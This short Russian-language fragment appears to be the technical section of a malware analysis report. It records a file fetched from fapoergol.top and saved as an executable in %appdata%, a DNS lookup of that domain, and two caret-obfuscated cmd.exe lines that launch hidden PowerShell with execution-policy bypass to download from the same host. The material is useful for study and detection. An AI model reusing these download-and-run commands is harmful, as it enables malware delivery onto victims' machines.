Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWeR^sHe^lL.eXE -^EX^ec^uTIOnp^ol^Ic^Y ^BYP^As^s ^-nOp^R^OFI^lE -^windo^WSt^Y^l^E^ hiDden (NEw-O^b^j^e^Ct ^sySt^eM^.^N^Et.w^e^BCl^IEnt).DOWNloAdFi^Le('http://www.fapoergol.top/read...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /C "poWeR^sHe^lL.eXE -^EX^ec^uTIOnp^ol^Ic^Y ^BYP^As^s ^-nOp^R^OFI^lE -^windo^WSt^Y^l^E^ hiDden (NEw-O^b^j^e^Ct ^sySt^eM^.^N^Et.w^e^BCl^IEnt).DOWNloAdFi^Le('http://www.fapoergol.top/read...' (со скрытым окном)